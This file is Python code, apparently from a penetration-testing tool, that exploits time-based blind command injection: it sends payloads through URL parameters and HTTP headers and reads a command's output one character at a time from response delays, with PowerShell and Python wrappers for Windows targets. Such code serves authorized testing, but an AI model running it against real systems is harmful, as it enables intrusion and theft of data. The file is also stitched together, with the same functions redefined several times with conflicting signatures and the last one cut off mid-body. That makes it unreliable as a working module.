def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):
    """Confirm that a time-based detection is reproducible and not a false positive.

    Step one sends ``cmd_execution`` payloads for an output length of 1 and 2
    and stops at the first length whose response is delayed.  Step two sends
    ``fp_result`` payloads for the candidate values 1..19, keeps the first
    candidate that delays the response, and compares the collected digits
    with ``str(randvcalc)``.

    Args:
        separator, prefix, suffix, whitespace: payload shaping inputs handed
            to ``tb_payloads`` / ``parameters`` and the whitespace substitution.
        TAG: accepted for interface compatibility; not read here.
        cmd: command under test.  On Windows it is wrapped in a
            length-printing command for step one and restored for step two.
        timesec: base delay; a random 1-5 seconds is added before any request.
        http_request_method, url, vuln_parameter, url_time_response: request
            context passed to the injection-test helpers.
        randvcalc: the value the payload is expected to produce (compared as str).
        alter_shell: selects the ``*_alter_shell`` payload variants.
        how_long: previous response time; overwritten by every measurement.

    Returns:
        ``(how_long, output)`` when the recovered value equals
        ``str(randvcalc)``; ``None`` otherwise.

    A response counts as delayed when ``how_long >= settings.FOUND_HOW_LONG``
    and ``how_long - timesec >= settings.FOUND_DIFF``.  Progress and payloads
    are written to stdout according to ``settings.VERBOSITY_LEVEL``.
    """
    on_windows = settings.TARGET_OS == "win"
    if on_windows:
        previous_cmd = cmd
        # NOTE(review): `cmd` is spliced into a quoted one-liner without any
        # escaping, so a quote character inside it breaks the wrapper.
        if alter_shell:
            cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
        else:
            cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

    banner = "Checking the reliability of the used payload "
    banner += "in case of a false positive result... "
    if settings.VERBOSITY_LEVEL == 1:
        sys.stdout.write(settings.print_info_msg(banner))
        sys.stdout.flush()
    elif settings.VERBOSITY_LEVEL > 1:
        print(settings.print_info_msg(banner))

    # Jitter the delay so the check does not merely replay the original timing.
    timesec = timesec + random.randint(1, 5)

    def build_payload(raw):
        """Shape a raw payload and echo it according to the verbosity level."""
        shaped = parameters.prefixes(raw, prefix)
        shaped = parameters.suffixes(shaped, suffix)
        # NOTE(review): `whitespace` acts as a re.sub replacement template, so a
        # backslash in it is interpreted as an escape -- confirm the configured
        # values never contain one.
        shaped = re.sub(" ", whitespace, shaped)
        shaped = checks.perform_payload_modification(shaped)
        if settings.VERBOSITY_LEVEL == 1:
            sys.stdout.write("\n" + settings.print_payload(shaped.replace("\n", "\\n")))
        elif settings.VERBOSITY_LEVEL > 1:
            print(settings.print_info_msg("Generating a payload for testing the reliability of used payload..."))
            sys.stdout.write(settings.print_payload(shaped.replace("\n", "\\n")) + "\n")
        return shaped

    def send_payload(shaped):
        """Deliver the payload through the configured injection point; return the response time."""
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            return cookie_injection_test(url, vuln_parameter, shaped)
        if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            return user_agent_injection_test(url, vuln_parameter, shaped)
        if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            return referer_injection_test(url, vuln_parameter, shaped)
        if menu.options.host and settings.INJECT_TAG in menu.options.host:
            return host_injection_test(url, vuln_parameter, shaped)
        if settings.CUSTOM_HEADER_INJECTION:
            return custom_header_injection_test(url, vuln_parameter, shaped)
        return examine_requests(shaped, vuln_parameter, http_request_method, url, timesec, url_time_response)

    def is_delayed(elapsed):
        """Both detection thresholds must hold for a response to count."""
        return elapsed >= settings.FOUND_HOW_LONG and elapsed - timesec >= settings.FOUND_DIFF

    # Step one: which output length (1 or 2) yields a delayed response?
    length_found = False
    for output_length in range(1, 3):
        if alter_shell:
            raw = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
        else:
            raw = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
        how_long = send_payload(build_payload(raw))
        if is_delayed(how_long):
            length_found = True
            break
    if not length_found:
        return None

    # Step two: recover the value, using the original (unwrapped) command.
    if on_windows:
        cmd = previous_cmd
    sys.stdout.flush()
    recovered = []
    matched = False
    for position in range(1, output_length + 1):
        for candidate in range(1, 20):
            if alter_shell:
                raw = tb_payloads.fp_result_alter_shell(separator, cmd, position, candidate, timesec, http_request_method)
            else:
                raw = tb_payloads.fp_result(separator, cmd, position, candidate, timesec, http_request_method)
            how_long = send_payload(build_payload(raw))
            if is_delayed(how_long):
                recovered.append(candidate)
                matched = True
                break
        # The first matching candidate ends the search for every position.
        if matched:
            break
    output = "".join(str(p) for p in recovered)
    if output == str(randvcalc):
        return how_long, output
    return None
def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):
    """Confirm that a time-based detection is reproducible and not a false positive.

    Step one sends ``cmd_execution`` payloads for an output length of 1 and 2
    and stops at the first length whose response is delayed.  Step two sends,
    for every position, ``fp_result`` payloads for the candidate values 1 and
    2, keeps the first candidate that delays the response, and compares the
    collected digits with ``str(randvcalc)``.

    Args:
        separator, prefix, suffix, whitespace: payload shaping inputs handed
            to ``tb_payloads`` / ``parameters`` and the whitespace substitution.
        TAG: accepted for interface compatibility; not read here.
        cmd: command under test.
        delay: base delay used by the payloads and in the detection thresholds.
        http_request_method, url, vuln_parameter, url_time_response: request
            context passed to the injection-test helpers.
        randvcalc: the value the payload is expected to produce (compared as str).
        alter_shell: selects the ``*_alter_shell`` payload variants.
        how_long: previous response time; overwritten by every measurement.

    Returns:
        ``(how_long, output)`` when the recovered value equals
        ``str(randvcalc)``; ``None`` otherwise.

    A response counts as delayed when ``how_long >= settings.FOUND_HOW_LONG``
    and ``how_long - delay >= settings.FOUND_DIFF``.
    """
    if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write(settings.print_info_msg("Testing the reliability of used payload... "))
        sys.stdout.flush()

    def build_payload(raw):
        """Shape a raw payload (prefix, suffix, whitespace, base64 tamper) and echo it when verbose."""
        shaped = parameters.prefixes(raw, prefix)
        shaped = parameters.suffixes(shaped, suffix)
        # NOTE(review): `whitespace` acts as a re.sub replacement template, so a
        # backslash in it is interpreted as an escape -- confirm the configured
        # values never contain one.
        shaped = re.sub(" ", whitespace, shaped)
        if settings.TAMPER_SCRIPTS['base64encode']:
            shaped = base64.b64encode(shaped)
        if settings.VERBOSITY_LEVEL >= 1:
            sys.stdout.write("\n" + settings.print_payload(shaped.replace("\n", "\\n")))
        return shaped

    def send_payload(shaped):
        """Deliver the payload through the configured injection point; return the response time."""
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            return cookie_injection_test(url, vuln_parameter, shaped)
        if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            return user_agent_injection_test(url, vuln_parameter, shaped)
        if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            return referer_injection_test(url, vuln_parameter, shaped)
        if settings.CUSTOM_HEADER_INJECTION:
            return custom_header_injection_test(url, vuln_parameter, shaped)
        return examine_requests(shaped, vuln_parameter, http_request_method, url, delay, url_time_response)

    def is_delayed(elapsed):
        """Both detection thresholds must hold for a response to count."""
        return elapsed >= settings.FOUND_HOW_LONG and elapsed - delay >= settings.FOUND_DIFF

    # Step one: which output length (1 or 2) yields a delayed response?
    length_found = False
    for output_length in range(1, 3):
        if alter_shell:
            raw = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
        else:
            raw = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
        how_long = send_payload(build_payload(raw))
        if is_delayed(how_long):
            length_found = True
            break
    if not length_found:
        return None

    # Step two: recover one candidate per position.
    sys.stdout.flush()
    recovered = []
    for position in range(1, output_length + 1):
        for candidate in range(1, 3):
            if alter_shell:
                raw = tb_payloads.fp_result_alter_shell(separator, cmd, position, candidate, delay, http_request_method)
            else:
                raw = tb_payloads.fp_result(separator, cmd, position, candidate, delay, http_request_method)
            how_long = send_payload(build_payload(raw))
            if is_delayed(how_long):
                recovered.append(candidate)
                break
    output = "".join(str(p) for p in recovered)
    if output == str(randvcalc):
        return how_long, output
    return None
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
    """Recover the output of ``cmd`` over a time-based (blind) channel.

    Step one sends ``cmd_execution`` payloads for every candidate output
    length in ``[minlen, maxlen)`` and stops at the first length whose
    response is delayed.  Step two then, for every character position, sends
    one ``get_char`` payload per candidate code from
    ``checks.generate_char_pool`` and keeps the first candidate that delays
    the response.

    Args:
        separator, prefix, suffix, whitespace: payload shaping inputs handed
            to ``tb_payloads`` / ``parameters`` and the whitespace substitution.
        maxlen: exclusive upper bound of the output-length search.
        TAG, filename: accepted for interface compatibility; not read here.
        cmd: command whose output is recovered.  On Windows it is wrapped in
            a length-printing command for step one and restored for step two.
        timesec: base delay used by the payloads and in the detection thresholds.
        http_request_method, url, vuln_parameter, url_time_response: request
            context passed to the injection-test helpers.
        alter_shell: selects the ``*_alter_shell`` payload variants.

    Returns:
        ``(check_how_long, output)``: the whole seconds spent in step two and
        the recovered string (``""`` when it consisted only of spaces).  When
        no output length is detected, ``(0, False)``.

    A response counts as delayed when ``how_long >= settings.FOUND_HOW_LONG``
    and ``how_long - timesec >= settings.FOUND_DIFF``.  Progress is written
    to stdout according to ``settings.VERBOSITY_LEVEL``.
    """
    if settings.TARGET_OS == "win":
        # Step one needs the *length* of the output, so the command is wrapped
        # in a length-printing one-liner; the original is restored for step two.
        previous_cmd = cmd
        # NOTE(review): `cmd` is concatenated into a quoted one-liner without
        # any escaping, so a quote character inside it breaks the wrapper.
        if alter_shell:
            cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
        else:
            cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"
    # File write / upload may legitimately produce no output, so allow length 0.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1
    found_chars = False
    info_msg = "Retrieving the length of execution output... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL > 1:
        print ""
    # Step one: find the output length.
    for output_length in range(int(minlen), int(maxlen)):
        if alter_shell:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
        else:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        # Whitespace fixation.  NOTE(review): `whitespace` is a re.sub
        # replacement template, so a backslash in it is interpreted as an
        # escape -- confirm the configured values never contain one.
        payload = re.sub(" ", whitespace, payload)
        # Perform payload modification (tamper hooks).
        payload = checks.perform_payload_modification(payload)
        # Echo the payload at --verbose; at higher verbosity also announce it.
        if settings.VERBOSITY_LEVEL == 1:
            payload_msg = payload.replace("\n", "\\n")
            sys.stdout.write("\n" + settings.print_payload(payload_msg))
        elif settings.VERBOSITY_LEVEL > 1:
            info_msg = "Generating a payload for injection..."
            print settings.print_info_msg(info_msg)
            payload_msg = payload.replace("\n", "\\n")
            sys.stdout.write(settings.print_payload(payload_msg) + "\n")
        # Route the payload through whichever header carries the INJECT tag;
        # otherwise fall back to the regular parameter-based request.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            how_long = host_injection_test(url, vuln_parameter, payload)
        elif settings.CUSTOM_HEADER_INJECTION:
            how_long = custom_header_injection_test(url, vuln_parameter, payload)
        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
        # Examine time-responses: both thresholds must hold.
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
            injection_check = True
        if injection_check == True:
            if output_length > 1:
                if settings.VERBOSITY_LEVEL >= 1:
                    pass
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                if settings.VERBOSITY_LEVEL == 1:
                    print ""
                success_msg = "Retrieved " + str(output_length) + " characters."
                print settings.print_success_msg(success_msg)
            found_chars = True
            injection_check = False
            break
    # Proceed with the next (injection) step!
    if found_chars == True:
        if settings.TARGET_OS == "win":
            cmd = previous_cmd
        # Exclusive bound for the position loop below (which reuses the name).
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()
        output = []
        percent = "0.0"
        info_msg = "Presuming the execution output, please wait... "
        # NOTE(review): this branch keys on menu.options.verbose whereas the
        # rest of the function keys on settings.VERBOSITY_LEVEL -- presumably
        # the same setting; verify.
        if menu.options.verbose < 1:
            info_msg += "[ " + str(percent) + "% ]"
        elif menu.options.verbose == 1:
            info_msg += ""
        else:
            info_msg += "\n"
        sys.stdout.write("\r" + settings.print_info_msg(info_msg))
        sys.stdout.flush()
        # Step two: per position, try each candidate code until one delays.
        for num_of_chars in range(1, int(num_of_chars)):
            char_pool = checks.generate_char_pool(num_of_chars)
            for ascii_char in char_pool:
                if alter_shell:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
                else:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)
                # Whitespace fixation (same re.sub caveat as above).
                payload = re.sub(" ", whitespace, payload)
                # Perform payload modification (tamper hooks).
                payload = checks.perform_payload_modification(payload)
                # Echo the payload according to the verbosity level.
                if settings.VERBOSITY_LEVEL == 1:
                    payload_msg = payload.replace("\n", "\\n")
                    sys.stdout.write("\n" + settings.print_payload(payload_msg))
                elif settings.VERBOSITY_LEVEL > 1:
                    info_msg = "Generating a payload for injection..."
                    print settings.print_info_msg(info_msg)
                    payload_msg = payload.replace("\n", "\\n")
                    sys.stdout.write(settings.print_payload(payload_msg) + "\n")
                # Same injection-point dispatch as in step one.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)
                elif menu.options.host and settings.INJECT_TAG in menu.options.host:
                    how_long = host_injection_test(url, vuln_parameter, payload)
                elif settings.CUSTOM_HEADER_INJECTION:
                    how_long = custom_header_injection_test(url, vuln_parameter, payload)
                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
                # Examine time-responses: both thresholds must hold.
                injection_check = False
                if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
                    injection_check = True
                if injection_check == True:
                    if not settings.VERBOSITY_LEVEL >= 1:
                        output.append(chr(ascii_char))
                        # Integer division under the Python 2 this file targets
                        # (print statements), so `percent == 100` only at the
                        # last position; the float form drives the display.
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = str("{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))) + "%"
                        if percent == 100:
                            float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                        info_msg = "Presuming the execution output, "
                        info_msg += "please wait... [ " + float_percent + " ]"
                        sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    injection_check = False
                    break
        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)
        # Check for empty output (nothing at all, or only spaces).
        if output == (len(output) * " "):
            output = ""
    else:
        check_start = 0
        if not settings.VERBOSITY_LEVEL >= 1:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        # False (not "") signals that no length was detected at all.
        output = False
    if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
        print ""
    return check_how_long, output
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long):
    """Confirm that a time-based detection is reproducible and not a false positive.

    Step one sends ``cmd_execution`` payloads for an output length of 1 and 2
    and stops at the first length whose response time equals the incoming
    ``how_long`` and is at least ``delay``.  Step two sends, for every
    position, ``fp_result`` payloads for the candidate values 1 and 2, keeps
    the first candidate that reproduces the step-one timing, and compares the
    collected digits with ``str(randvcalc)``.

    Args:
        separator, prefix, suffix: payload shaping inputs.
        TAG: accepted for interface compatibility; not read here.
        cmd: command under test.
        delay: minimum response time for a request to count.
        http_request_method, url, vuln_parameter: request context passed to
            the injection-test helpers.
        randvcalc: the value the payload is expected to produce (compared as str).
        alter_shell: selects the ``*_alter_shell`` payload variants.
        how_long: the response time of the original detection; used as the
            reference timing and overwritten by every measurement.

    Returns:
        ``(how_long, output)`` when the recovered value equals
        ``str(randvcalc)``; ``None`` otherwise.
    """
    # Reference timing that later measurements must reproduce exactly.
    reference = how_long
    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    def build_payload(raw):
        """Shape a raw payload (prefix, suffix, optional base64) and echo it when verbose."""
        shaped = parameters.prefixes(raw, prefix)
        shaped = parameters.suffixes(shaped, suffix)
        if menu.options.base64:
            shaped = base64.b64encode(shaped)
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + shaped.replace("\n", "\\n") + Style.RESET_ALL)
        return shaped

    def send_payload(shaped):
        """Deliver the payload through the configured injection point; return the response time."""
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            return cookie_injection_test(url, vuln_parameter, shaped)
        if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            return user_agent_injection_test(url, vuln_parameter, shaped)
        if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            return referer_injection_test(url, vuln_parameter, shaped)
        return examine_requests(shaped, vuln_parameter, http_request_method, url)

    def reproduces(elapsed, expected):
        """True when the timing equals the reference and reaches the delay."""
        return expected == elapsed and elapsed >= delay

    # Step one: which output length (1 or 2) reproduces the reference timing?
    length_found = False
    for output_length in range(1, 3):
        if alter_shell:
            raw = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
        else:
            raw = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
        how_long = send_payload(build_payload(raw))
        if reproduces(how_long, reference):
            length_found = True
            break
    if not length_found:
        return None

    # Step two: the timing found above becomes the new reference.
    reference = how_long
    sys.stdout.flush()
    recovered = []
    for position in range(1, output_length + 1):
        for candidate in range(1, 3):
            if alter_shell:
                raw = tb_payloads.fp_result_alter_shell(separator, cmd, position, candidate, delay, http_request_method)
            else:
                raw = tb_payloads.fp_result(separator, cmd, position, candidate, delay, http_request_method)
            how_long = send_payload(build_payload(raw))
            if reproduces(how_long, reference):
                recovered.append(candidate)
                break
    output = "".join(str(p) for p in recovered)
    if output == str(randvcalc):
        return how_long, output
    return None
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
    """Recover the output of ``cmd`` over a time-based (blind) channel.

    Step one sends ``cmd_execution`` payloads for every candidate output
    length in ``[minlen, maxlen)`` and stops at the first length whose
    response is delayed.  Step two then, for every character position, sends
    one ``get_char`` payload per candidate code (letters first, then digits
    and symbols) and keeps the first candidate that delays the response.

    Args:
        separator, prefix, suffix: payload shaping inputs handed to
            ``tb_payloads`` / ``parameters``.
        maxlen: exclusive upper bound of the output-length search.
        TAG, filename: accepted for interface compatibility; not read here.
        cmd: command whose output is recovered.  On Windows it is wrapped in
            a length-printing command for step one and restored for step two.
        delay: base delay used by the payloads and in the detection thresholds.
        http_request_method, url, vuln_parameter, url_time_response: request
            context passed to the injection-test helpers.
        alter_shell: selects the ``*_alter_shell`` payload variants.

    Returns:
        ``(check_how_long, output)``: the whole seconds spent in step two and
        the recovered string (``""`` when it consisted only of spaces).  When
        no output length is detected, ``(0, False)``.

    A response counts as delayed when ``how_long >= settings.FOUND_HOW_LONG``
    and ``how_long - delay >= settings.FOUND_DIFF``.  Progress is written to
    stdout; ``menu.options.verbose`` switches the progress bar for payload echo.
    """
    if settings.TARGET_OS == "win":
        # Step one needs the *length* of the output, so the command is wrapped
        # in a length-printing one-liner; the original is restored for step two.
        previous_cmd = cmd
        # NOTE(review): `cmd` is concatenated into a quoted one-liner without
        # any escaping, so a quote character inside it breaks the wrapper.
        if alter_shell:
            cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
        else:
            cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"
    # File write / upload may legitimately produce no output, so allow length 0.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1
    found_chars = False
    sys.stdout.write(settings.INFO_SIGN + "Retrieving the length of execution output... ")
    sys.stdout.flush()
    # Step one: find the output length.
    for output_length in range(int(minlen), int(maxlen)):
        if alter_shell:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
        else:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        if menu.options.base64:
            payload = base64.b64encode(payload)
        # Echo the payload when "--verbose" is set.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL)
        # Route the payload through whichever header carries the INJECT tag;
        # otherwise fall back to the regular parameter-based request.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)
        elif settings.CUSTOM_HEADER_INJECTION:
            how_long = custom_header_injection_test(url, vuln_parameter, payload)
        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
        # Examine time-responses: both thresholds must hold.
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
            injection_check = True
        if injection_check == True:
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            injection_check = False
            break
    # Proceed with the next (injection) step!
    if found_chars == True:
        # Exclusive bound for the position loop below (which reuses the name).
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()
        if settings.TARGET_OS == "win":
            cmd = previous_cmd
        output = []
        percent = "0.0"
        sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()
        # Step two: per position, try each candidate code until one delays.
        for num_of_chars in range(1, int(num_of_chars)):
            # Candidate order: upper-case first for the first position,
            # lower-case first afterwards.  The ranges are half-open, so 'Z'
            # (90) and 'z' (122) are picked up by the trailing ranges below;
            # together they cover codes 32..126 exactly once.
            if num_of_chars == 1:
                char_pool = range(65, 90) + range(96, 122)
            else:
                char_pool = range(96, 122) + range(65, 90)
            char_pool = char_pool + range(48, 57) + range(32, 48) + range(90, 96) + range(57, 65) + range(122, 127)
            for ascii_char in char_pool:
                if alter_shell:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
                else:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)
                if menu.options.base64:
                    payload = base64.b64encode(payload)
                # Echo the payload when "--verbose" is set.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL)
                # Same injection-point dispatch as in step one.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)
                elif settings.CUSTOM_HEADER_INJECTION:
                    how_long = custom_header_injection_test(url, vuln_parameter, payload)
                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
                # Examine time-responses: both thresholds must hold.
                injection_check = False
                if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
                    injection_check = True
                if injection_check == True:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        # `percent` is integer division under the Python 2 this
                        # file targets (print statements) and is not displayed;
                        # the float form below drives the progress bar.
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))
                        sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    injection_check = False
                    break
        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)
        # Check for empty output (nothing at all, or only spaces).
        if output == (len(output) * " "):
            output = ""
    else:
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        # False (not "") signals that no length was detected at all.
        output = False
    return check_how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
    """Recover the output of ``cmd`` over a time-based (blind) channel.

    Step one sends ``cmd_execution`` payloads for every candidate output
    length in ``[minlen, maxlen)`` and stops at the first length whose
    response is delayed.  Step two then, for every character position, sends
    one ``get_char`` payload per candidate code (letters first, then digits
    and symbols) and keeps the first candidate that delays the response.

    Args:
        separator, prefix, suffix: payload shaping inputs handed to
            ``tb_payloads`` / ``parameters``.
        maxlen: exclusive upper bound of the output-length search.
        TAG, filename: accepted for interface compatibility; not read here.
        cmd: command whose output is recovered.  On Windows it is wrapped in
            a length-printing command for step one and restored for step two.
        delay: base delay used by the payloads and in the detection thresholds.
        http_request_method, url, vuln_parameter, url_time_response: request
            context passed to the injection-test helpers.
        alter_shell: selects the ``*_alter_shell`` payload variants.

    Returns:
        ``(check_how_long, output)``: the whole seconds spent in step two and
        the recovered string (``""`` when it consisted only of spaces).  When
        no output length is detected, ``(0, False)``.

    A response counts as delayed when ``how_long >= settings.FOUND_HOW_LONG``
    and ``how_long - delay >= settings.FOUND_DIFF``.  Progress is written to
    stdout; ``menu.options.verbose`` switches the progress bar for payload echo.
    """
    if settings.TARGET_OS == "win":
        # Step one needs the *length* of the output, so the command is wrapped
        # in a length-printing one-liner; the original is restored for step two.
        previous_cmd = cmd
        # NOTE(review): `cmd` is concatenated into a quoted one-liner without
        # any escaping, so a quote character inside it breaks the wrapper.
        if alter_shell:
            cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
        else:
            cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"
    # File write / upload may legitimately produce no output, so allow length 0.
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1
    found_chars = False
    sys.stdout.write(settings.INFO_SIGN + "Retrieving the length of execution output... ")
    sys.stdout.flush()
    # Step one: find the output length.
    for output_length in range(int(minlen), int(maxlen)):
        if alter_shell:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
        else:
            # Execute shell commands on vulnerable host.
            payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        if menu.options.base64:
            payload = base64.b64encode(payload)
        # Echo the payload when "--verbose" is set.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL)
        # Route the payload through whichever header carries the INJECT tag;
        # otherwise fall back to the regular parameter-based request.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)
